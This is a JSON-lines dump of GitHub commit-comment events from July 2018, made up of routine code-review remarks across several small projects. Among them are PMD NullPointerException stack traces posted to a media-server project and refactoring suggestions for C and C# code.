{"id":"8034473212","type":"CommitCommentEvent","actor":{"login":"hyejin106"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29876361,"position":67,"line":67,"path":"main.cpp","commit_id":"168cdd63ab964827e05fe4cd7efc348a368ef894","created_at":"2018-07-29T19:05:24Z","updated_at":"2018-07-29T19:05:24Z","author_association":"OWNER","body":"Done in https://github.com/hyejin106/pcap_test/commit/83a7b96765f6be4c8328bfc6138995d47b7b1329#diff-118fcbaaba162ba17933c7893247df3a"}},"created_at":"2018-07-29T19:05:24Z"}
{"id":"8034473755","type":"CommitCommentEvent","actor":{"login":"hyejin106"},"repo":{"name":"hyejin106/pcap_test"},"payload":{"comment":{"id":29876362,"position":70,"line":70,"path":"main.cpp","commit_id":"168cdd63ab964827e05fe4cd7efc348a368ef894","created_at":"2018-07-29T19:05:49Z","updated_at":"2018-07-29T19:05:49Z","author_association":"OWNER","body":"Done in https://github.com/hyejin106/pcap_test/commit/2d710dd78907c58ce59f2b17475e3e52435b5161#diff-118fcbaaba162ba17933c7893247df3a"}},"created_at":"2018-07-29T19:05:49Z"}
{"id":"8034473905","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876363,"position":null,"line":null,"path":null,"commit_id":"7c600bfd314800d604efbc3dce116afc5804c337","created_at":"2018-07-29T19:05:57Z","updated_at":"2018-07-29T19:05:57Z","author_association":"CONTRIBUTOR","body":"Method names only have to be unique within their context/class, so you can safely do that."}},"created_at":"2018-07-29T19:05:57Z"}
{"id":"8034474421","type":"CommitCommentEvent","actor":{"login":"JulisaBlaszkow"},"repo":{"name":"JulisaBlaszkow/new-repo"},"payload":{"comment":{"id":29876367,"position":null,"line":null,"path":null,"commit_id":"4b0ae10cfccbb56706840b17feedfd3f9508b5f9","created_at":"2018-07-29T19:06:19Z","updated_at":"2018-07-29T19:06:19Z","author_association":"OWNER","body":"wow. very fancy function. so skilled."}},"created_at":"2018-07-29T19:06:19Z"}
{"id":"8034474488","type":"CommitCommentEvent","actor":{"login":"kjhk3082"},"repo":{"name":"kjhk3082/pcap_test"},"payload":{"comment":{"id":29876368,"position":96,"line":70,"path":"main.cpp","commit_id":"99c44d0686719ad4c5cd4e03f41a9410d2c67f8e","created_at":"2018-07-29T19:06:22Z","updated_at":"2018-07-29T19:06:22Z","author_association":"OWNER","body":"i=0; i<16;으로 수정하였습니다"}},"created_at":"2018-07-29T19:06:22Z"}
{"id":"8034475225","type":"CommitCommentEvent","actor":{"login":"SterbenScix12"},"repo":{"name":"SterbenScix12/Love-My-Friend-Juice-VN"},"payload":{"comment":{"id":29876369,"position":null,"line":null,"path":null,"commit_id":"cdc6a913ff720d0434715c84eaae20a4082fea17","created_at":"2018-07-29T19:06:53Z","updated_at":"2018-07-29T19:06:53Z","author_association":"OWNER","body":"Good shit"}},"created_at":"2018-07-29T19:06:53Z"}
{"id":"8034475926","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29876370,"position":10,"line":8,"path":"BankManagement/BankManagement/fileUtils.h","commit_id":"1bc0a3274b5fffe2f68be6d7e3a1e48705a0e954","created_at":"2018-07-29T19:07:26Z","updated_at":"2018-07-29T19:07:26Z","author_association":"NONE","body":"how deposit money withdraw money and edit_user_data are related to fileUtils? \r\nremove them from here, and add them as private (static) in bankAPI"}},"created_at":"2018-07-29T19:07:26Z"}
{"id":"8034476615","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876371,"position":18,"line":18,"path":"src/main/java/net/pms/io/SimpleProcessWrapper.java","commit_id":"b53da04e7aeae5ddb4042340bda699b06f79f17e","created_at":"2018-07-29T19:07:58Z","updated_at":"2018-07-29T19:07:58Z","author_association":"CONTRIBUTOR","body":"A NPE is throwed:\r\n```\r\n\r\nError while processing F:\\DigitalMediaServer\\src\\main\\java\\net\\pms\\io\\SimpleProcessWrapper.java\r\n\r\nnet.sourceforge.pmd.PMDException: Error while processing F:\\DigitalMediaServer\\src\\main\\java\\net\\pms\\io\\SimpleProcessWrapper.java\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.processSourceCode(SourceCodeProcessor.java:101)\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.processSourceCode(SourceCodeProcessor.java:50)\r\n\tat net.sourceforge.pmd.processor.PmdRunnable.call(PmdRunnable.java:75)\r\n\tat net.sourceforge.pmd.processor.PmdRunnable.call(PmdRunnable.java:23)\r\n\tat java.util.concurrent.FutureTask.run(FutureTask.java:266)\r\n\tat java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)\r\n\tat java.util.concurrent.FutureTask.run(FutureTask.java:266)\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)\r\n\tat java.lang.Thread.run(Thread.java:748)\r\nCaused by: java.lang.NullPointerException\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.typedefinition.JavaTypeDefinitionSimple.toString(JavaTypeDefinitionSimple.java:249)\r\n\tat java.lang.String.valueOf(String.java:2994)\r\n\tat java.lang.StringBuilder.append(StringBuilder.java:131)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.typedefinition.JavaTypeDefinitionUpper.toString(JavaTypeDefinitionUpper.java:116)\r\n\tat java.lang.String.valueOf(String.java:2994)\r\n\tat java.lang.StringBuilder.append(StringBuilder.java:131)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.MethodType.toString(MethodType.java:78)\r\n\tat java.lang.String.valueOf(String.java:2994)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.MethodTypeResolution.selectMethodsThirdPhase(MethodTypeResolution.java:358)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.MethodTypeResolution.getBestMethodReturnType(MethodTypeResolution.java:384)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:434)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTName.jjtAccept(ASTName.java:35)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:314)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:1019)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTPrimaryPrefix.jjtAccept(ASTPrimaryPrefix.java:42)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:855)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTPrimaryExpression.jjtAccept(ASTPrimaryExpression.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:230)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:715)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTExpression.jjtAccept(ASTExpression.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:422)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTReturnStatement.jjtAccept(ASTReturnStatement.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:350)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTStatement.jjtAccept(ASTStatement.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:362)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTBlockStatement.jjtAccept(ASTBlockStatement.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:358)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTBlock.jjtAccept(ASTBlock.java:25)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:182)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTMethodDeclaration.jjtAccept(ASTMethodDeclaration.java:31)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:46)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTClassOrInterfaceBodyDeclaration.jjtAccept(ASTClassOrInterfaceBodyDeclaration.java:41)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:42)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTClassOrInterfaceBody.jjtAccept(ASTClassOrInterfaceBody.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:18)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:339)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTClassOrInterfaceDeclaration.jjtAccept(ASTClassOrInterfaceDeclaration.java:39)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:158)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:251)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTTypeDeclaration.jjtAccept(ASTTypeDeclaration.java:35)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:138)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:222)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTCompilationUnit.jjtAccept(ASTCompilationUnit.java:41)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.TypeResolutionFacade.initializeWith(TypeResolutionFacade.java:18)\r\n\tat net.sourceforge.pmd.lang.java.AbstractJavaHandler$5.start(AbstractJavaHandler.java:97)\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.usesTypeResolution(SourceCodeProcessor.java:149)\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.processSource(SourceCodeProcessor.java:177)\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.processSourceCode(SourceCodeProcessor.java:95)\r\n\t... 9 more\r\n\r\n```"}},"created_at":"2018-07-29T19:07:58Z"}
{"id":"8034477405","type":"CommitCommentEvent","actor":{"login":"MaciekTalaska"},"repo":{"name":"asdf-vm/asdf-erlang"},"payload":{"comment":{"id":29876375,"position":null,"line":null,"path":null,"commit_id":"716d94174956ccbb0f771febe87e02c8df09ba56","created_at":"2018-07-29T19:08:28Z","updated_at":"2018-07-29T19:08:28Z","author_association":"CONTRIBUTOR","body":"You're right. \r\n\r\nI have created a PR for installing documentation for Erlang: https://github.com/asdf-vm/asdf-erlang/pull/81"}},"created_at":"2018-07-29T19:08:28Z"}
{"id":"8034478896","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876382,"position":5,"line":5,"path":"src/main/java/net/pms/io/ThreadedProcessWrapper.java","commit_id":"b53da04e7aeae5ddb4042340bda699b06f79f17e","created_at":"2018-07-29T19:09:31Z","updated_at":"2018-07-29T19:09:31Z","author_association":"CONTRIBUTOR","body":"Same there:\r\n```\r\n\r\nError while processing F:\\DigitalMediaServer\\src\\main\\java\\net\\pms\\io\\ThreadedProcessWrapper.java\r\n\r\nnet.sourceforge.pmd.PMDException: Error while processing F:\\DigitalMediaServer\\src\\main\\java\\net\\pms\\io\\ThreadedProcessWrapper.java\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.processSourceCode(SourceCodeProcessor.java:101)\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.processSourceCode(SourceCodeProcessor.java:50)\r\n\tat net.sourceforge.pmd.processor.PmdRunnable.call(PmdRunnable.java:75)\r\n\tat net.sourceforge.pmd.processor.PmdRunnable.call(PmdRunnable.java:23)\r\n\tat java.util.concurrent.FutureTask.run(FutureTask.java:266)\r\n\tat java.util.concurrent.Executors$RunnableAdapter.call(Executors.java:511)\r\n\tat java.util.concurrent.FutureTask.run(FutureTask.java:266)\r\n\tat java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)\r\n\tat java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)\r\n\tat java.lang.Thread.run(Thread.java:748)\r\nCaused by: java.lang.NullPointerException\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.typedefinition.JavaTypeDefinitionSimple.toString(JavaTypeDefinitionSimple.java:249)\r\n\tat java.lang.String.valueOf(String.java:2994)\r\n\tat java.lang.StringBuilder.append(StringBuilder.java:131)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.typedefinition.JavaTypeDefinitionUpper.toString(JavaTypeDefinitionUpper.java:116)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.typedefinition.JavaTypeDefinitionUpper.shallowString(JavaTypeDefinitionUpper.java:126)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.typedefinition.JavaTypeDefinitionSimple.toString(JavaTypeDefinitionSimple.java:249)\r\n\tat java.lang.String.valueOf(String.java:2994)\r\n\tat java.lang.StringBuilder.append(StringBuilder.java:131)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.MethodType.toString(MethodType.java:78)\r\n\tat java.lang.String.valueOf(String.java:2994)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.MethodTypeResolution.selectMethodsThirdPhase(MethodTypeResolution.java:358)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.MethodTypeResolution.getBestMethodReturnType(MethodTypeResolution.java:384)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:434)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTName.jjtAccept(ASTName.java:35)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:314)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:1019)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTPrimaryPrefix.jjtAccept(ASTPrimaryPrefix.java:42)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:855)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTPrimaryExpression.jjtAccept(ASTPrimaryExpression.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:230)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:715)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTExpression.jjtAccept(ASTExpression.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:422)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTReturnStatement.jjtAccept(ASTReturnStatement.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:350)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTStatement.jjtAccept(ASTStatement.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:362)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTBlockStatement.jjtAccept(ASTBlockStatement.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:358)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTBlock.jjtAccept(ASTBlock.java:25)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:182)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTMethodDeclaration.jjtAccept(ASTMethodDeclaration.java:31)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:46)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTClassOrInterfaceBodyDeclaration.jjtAccept(ASTClassOrInterfaceBodyDeclaration.java:41)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:42)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTClassOrInterfaceBody.jjtAccept(ASTClassOrInterfaceBody.java:21)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:18)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:339)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTClassOrInterfaceDeclaration.jjtAccept(ASTClassOrInterfaceDeclaration.java:39)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:158)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:251)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTTypeDeclaration.jjtAccept(ASTTypeDeclaration.java:35)\r\n\tat net.sourceforge.pmd.lang.java.ast.AbstractJavaNode.childrenAccept(AbstractJavaNode.java:56)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:10)\r\n\tat net.sourceforge.pmd.lang.java.ast.JavaParserVisitorAdapter.visit(JavaParserVisitorAdapter.java:138)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.ClassTypeResolver.visit(ClassTypeResolver.java:222)\r\n\tat net.sourceforge.pmd.lang.java.ast.ASTCompilationUnit.jjtAccept(ASTCompilationUnit.java:41)\r\n\tat net.sourceforge.pmd.lang.java.typeresolution.TypeResolutionFacade.initializeWith(TypeResolutionFacade.java:18)\r\n\tat net.sourceforge.pmd.lang.java.AbstractJavaHandler$5.start(AbstractJavaHandler.java:97)\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.usesTypeResolution(SourceCodeProcessor.java:149)\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.processSource(SourceCodeProcessor.java:177)\r\n\tat net.sourceforge.pmd.SourceCodeProcessor.processSourceCode(SourceCodeProcessor.java:95)\r\n\t... 9 more\r\n\r\n```\r\n\r\nYou shouldn't have told to look at the reports ;P"}},"created_at":"2018-07-29T19:09:31Z"}
{"id":"8034479942","type":"CommitCommentEvent","actor":{"login":"didlie"},"repo":{"name":"didlie/browser-simple-peer"},"payload":{"comment":{"id":29876386,"position":null,"line":null,"path":null,"commit_id":"ef3dd71698fcb038ca22d85c1d69358287cc802a","created_at":"2018-07-29T19:10:15Z","updated_at":"2018-07-29T19:10:15Z","author_association":"OWNER","body":"This information is not valid to the total reconstruction and rewriting of all functionality, see the individual file headers for (c) information"}},"created_at":"2018-07-29T19:10:15Z"}
{"id":"8034482562","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29876396,"position":4,"line":13,"path":"BankManagement/BankManagement/fileUtils.c","commit_id":"1bc0a3274b5fffe2f68be6d7e3a1e48705a0e954","created_at":"2018-07-29T19:12:08Z","updated_at":"2018-07-29T19:12:08Z","author_association":"NONE","body":"WTF? This function is one of the most important functions in fileUtils! Why you declare it as private (static) function? everyone that include fileUtils.h should see it! why you use forward declaration here? put this function in the header!"}},"created_at":"2018-07-29T19:12:08Z"}
{"id":"8034482701","type":"CommitCommentEvent","actor":{"login":"Humwq"},"repo":{"name":"Solor/FreeUI"},"payload":{"comment":{"id":29876398,"position":null,"line":null,"path":null,"commit_id":"0a2a80c41cb1b927ff4c0e712880cd38e140be47","created_at":"2018-07-29T19:12:12Z","updated_at":"2018-07-29T19:12:12Z","author_association":"NONE","body":"感谢！\r\n喜欢三个动作条！"}},"created_at":"2018-07-29T19:12:12Z"}
{"id":"8034482871","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876399,"position":67,"line":62,"path":"LocPeek/LocPeek/LocPeek.Android/MainActivity.cs","commit_id":"c4abc9305d9db2d24b832e75ebee3fbf2db333df","created_at":"2018-07-29T19:12:19Z","updated_at":"2018-07-29T19:12:19Z","author_association":"COLLABORATOR","body":"This code from line 62 to 76 should be extracted into separate method, eg `setAlertForExecutingTheTask`"}},"created_at":"2018-07-29T19:12:19Z"}
{"id":"8034482937","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876400,"position":30,"line":25,"path":"LocPeek/LocPeek/LocPeek.Android/MainActivity.cs","commit_id":"c4abc9305d9db2d24b832e75ebee3fbf2db333df","created_at":"2018-07-29T19:12:22Z","updated_at":"2018-07-29T19:12:22Z","author_association":"COLLABORATOR","body":"Commented code"}},"created_at":"2018-07-29T19:12:22Z"}
{"id":"8034482975","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876401,"position":41,"line":36,"path":"LocPeek/LocPeek/LocPeek.Android/MainActivity.cs","commit_id":"c4abc9305d9db2d24b832e75ebee3fbf2db333df","created_at":"2018-07-29T19:12:23Z","updated_at":"2018-07-29T19:12:23Z","author_association":"COLLABORATOR","body":"Empty lines"}},"created_at":"2018-07-29T19:12:23Z"}
{"id":"8034483607","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876402,"position":99,"line":94,"path":"LocPeek/LocPeek/LocPeek.Android/MainActivity.cs","commit_id":"c4abc9305d9db2d24b832e75ebee3fbf2db333df","created_at":"2018-07-29T19:12:50Z","updated_at":"2018-07-29T19:12:50Z","author_association":"COLLABORATOR","body":"empty line"}},"created_at":"2018-07-29T19:12:50Z"}
{"id":"8034483798","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876403,"position":83,"line":78,"path":"LocPeek/LocPeek/LocPeek.Android/MainActivity.cs","commit_id":"c4abc9305d9db2d24b832e75ebee3fbf2db333df","created_at":"2018-07-29T19:12:58Z","updated_at":"2018-07-29T19:12:58Z","author_association":"COLLABORATOR","body":"empty lines"}},"created_at":"2018-07-29T19:12:58Z"}
{"id":"8034484624","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29876411,"position":18,"line":18,"path":"src/main/java/net/pms/io/SimpleProcessWrapper.java","commit_id":"b53da04e7aeae5ddb4042340bda699b06f79f17e","created_at":"2018-07-29T19:13:32Z","updated_at":"2018-07-29T19:13:32Z","author_association":"CONTRIBUTOR","body":"@Sami32 This commit is from 2016 and has been merged a long time ago. Also, the NPE you're referencing above isn't generated by this code, but by PMD. As far as I know, the PMD plugin isn't even run during normal builds?\r\n\r\nI think you should provide some context about what you're trying to do. It also clearly looks like a bug in PMD, not DMS. AFAICU no source code, no matter how crazy, should be able to make PMD crash with a NPE."}},"created_at":"2018-07-29T19:13:32Z"}
{"id":"8034485309","type":"CommitCommentEvent","actor":{"login":"MarekMyjak"},"repo":{"name":"Gori23/GeoApp"},"payload":{"comment":{"id":29876413,"position":104,"line":99,"path":"LocPeek/LocPeek/LocPeek.Android/MainActivity.cs","commit_id":"c4abc9305d9db2d24b832e75ebee3fbf2db333df","created_at":"2018-07-29T19:13:59Z","updated_at":"2018-07-29T19:13:59Z","author_association":"COLLABORATOR","body":"maybe extract this line to new method, eg. `ShowPermissionDeniedAlert`"}},"created_at":"2018-07-29T19:13:59Z"}
